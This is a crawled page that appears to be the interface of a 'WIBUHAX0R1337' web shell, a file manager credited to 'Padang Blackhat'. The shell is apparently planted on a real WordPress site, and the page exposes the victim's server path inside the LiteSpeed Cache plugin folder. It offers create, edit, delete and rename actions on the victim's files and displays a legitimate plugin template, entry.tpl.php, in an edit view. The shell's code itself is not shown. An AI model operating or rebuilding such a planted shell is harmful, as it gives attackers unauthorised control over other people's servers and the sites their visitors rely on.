-
WIBUHAX0R1337
-
/
home
/
coludnqa
/
xtrasolutionsco.com
/
wp-content
/
plugins
/
litespeed-cache
/
tpl
/
optimax
/
[ Home ]
Create Folder
Create File
Nama File / Folder
Size
Action
entry.tpl.php
1.205KB
Edit File
Delete File
Rename
settings.tpl.php
0.896KB
Edit File
Delete File
Rename
summary.tpl.php
0.772KB
Edit File
Delete File
Rename
<?php /** * LiteSpeed Cache OptimaX * * Manages the OptimaX interface for LiteSpeed Cache. * * @package LiteSpeed * @since 8.0 */ namespace LiteSpeed; defined( 'WPINC' ) || exit; $menu_list = array( 'summary' => esc_html__( 'OptimaX Summary', 'litespeed-cache' ), 'settings' => esc_html__( 'OptimaX Settings', 'litespeed-cache' ), ); if ( is_network_admin() ) { $menu_list = array( 'network_settings' => esc_html__( 'OptimaX Settings', 'litespeed-cache' ), ); } ?> <div class="wrap"> <h1 class="litespeed-h1"> <?php esc_html_e( 'LiteSpeed Cache OptimaX', 'litespeed-cache' ); ?> </h1> <span class="litespeed-desc"> v<?php echo esc_html( Core::VER ); ?> </span> <hr class="wp-header-end"> </div> <div class="litespeed-wrap"> <h2 class="litespeed-header nav-tab-wrapper"> <?php GUI::display_tab_list( $menu_list ); ?> </h2> <div class="litespeed-body"> <?php foreach ( $menu_list as $menu_key => $val ) { echo '<div data-litespeed-layout="' . esc_attr( $menu_key ) . '">'; require LSCWP_DIR . 'tpl/optimax/' . $menu_key . '.tpl.php'; echo '</div>'; } ?> </div> </div>
Save!!!
© 2022 - 2023 WIBUHAXOR V1 By Lutfifakee || Padang Blackhat